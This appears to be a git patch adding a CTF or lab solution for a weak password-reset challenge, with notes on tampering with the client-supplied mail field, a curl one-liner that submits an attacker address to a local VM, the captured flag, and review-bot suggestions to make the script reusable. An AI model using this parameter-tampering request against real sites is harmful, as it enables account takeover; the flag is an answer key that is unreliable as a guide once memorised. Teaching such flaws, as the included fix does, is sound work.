From 7501efd7a8fd1dc4ba363e13f7cc33b491a8e5a4 Mon Sep 17 00:00:00 2001 From: Thomas Vanbesien Date: Thu, 26 Mar 2026 17:53:24 +0100 Subject: Add weak password reset functionalities solution --- Weak password reset functionalities/Resources/notes.md | 7 +++++++ Weak password reset functionalities/Resources/reset.bash | 1 + Weak password reset functionalities/flag | 1 + 3 files changed, 9 insertions(+) create mode 100644 Weak password reset functionalities/Resources/notes.md create mode 100755 Weak password reset functionalities/Resources/reset.bash create mode 100644 Weak password reset functionalities/flag diff --git a/Weak password reset functionalities/Resources/notes.md b/Weak password reset functionalities/Resources/notes.md new file mode 100644 index 0000000..bac2ecd --- /dev/null +++ b/Weak password reset functionalities/Resources/notes.md @@ -0,0 +1,7 @@ +## Exploit + +The `"mail"` field of the **Recover Password** page can be inspected and edited and anyone. Open `http://10.0.2.15/?page=recover` with Firefox and change the value of the `` element before submitting the request. Alternatively, one may also use a script like the one provided in `reset.bash`. + +## Fix + +The problem here is that the server is trusting a client-supplied address instead of looking it up server-side. The client should supply a username/account identifier and the server must match it against its email in the database. diff --git a/Weak password reset functionalities/Resources/reset.bash b/Weak password reset functionalities/Resources/reset.bash new file mode 100755 index 0000000..e60803e --- /dev/null +++ b/Weak password reset functionalities/Resources/reset.bash @@ -0,0 +1 @@ +curl --silent --data-urlencode mail=hacker@example.com --data Submit=Submit 'http://10.0.2.15/?page=recover' | grep flag diff --git a/Weak password reset functionalities/flag b/Weak password reset functionalities/flag new file mode 100644 index 0000000..b67bb13 --- /dev/null 
+++ b/Weak password reset functionalities/flag @@ -0,0 +1 @@ +1d4855f7337c0c14b6f44946872c4eb33853f40b2d54393fbe94f49f1e19bbb0 -- cgit v1.2.3
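Review bot: In the Exploit paragraph of notes.md, "can be inspected and edited and anyone" looks like a typo for "by anyone", and the element reference is empty (the backticks enclose nothing, presumably because the HTML tag was swallowed by the renderer); spell out which element is meant, for example the form input whose `name` is `mail`, since that is the parameter reset.bash sends. In the Fix paragraph, state explicitly that the address the reset mail is sent to must be read from the account record on the server and never from any request parameter, because that parameter is exactly what the exploit edits.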
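Review bot: reset.bash is committed with mode 100755 but has no shebang line, so which interpreter runs it depends on the caller; add `#!/bin/sh` as the first line. The target `http://10.0.2.15/?page=recover` and the attacker address `hacker@example.com` are hard-coded; take them from positional arguments or variables so the script is reusable outside this VM. Also consider `curl --fail` (or checking curl's exit status) so that a non-2xx response does not silently turn into an empty `grep flag` result.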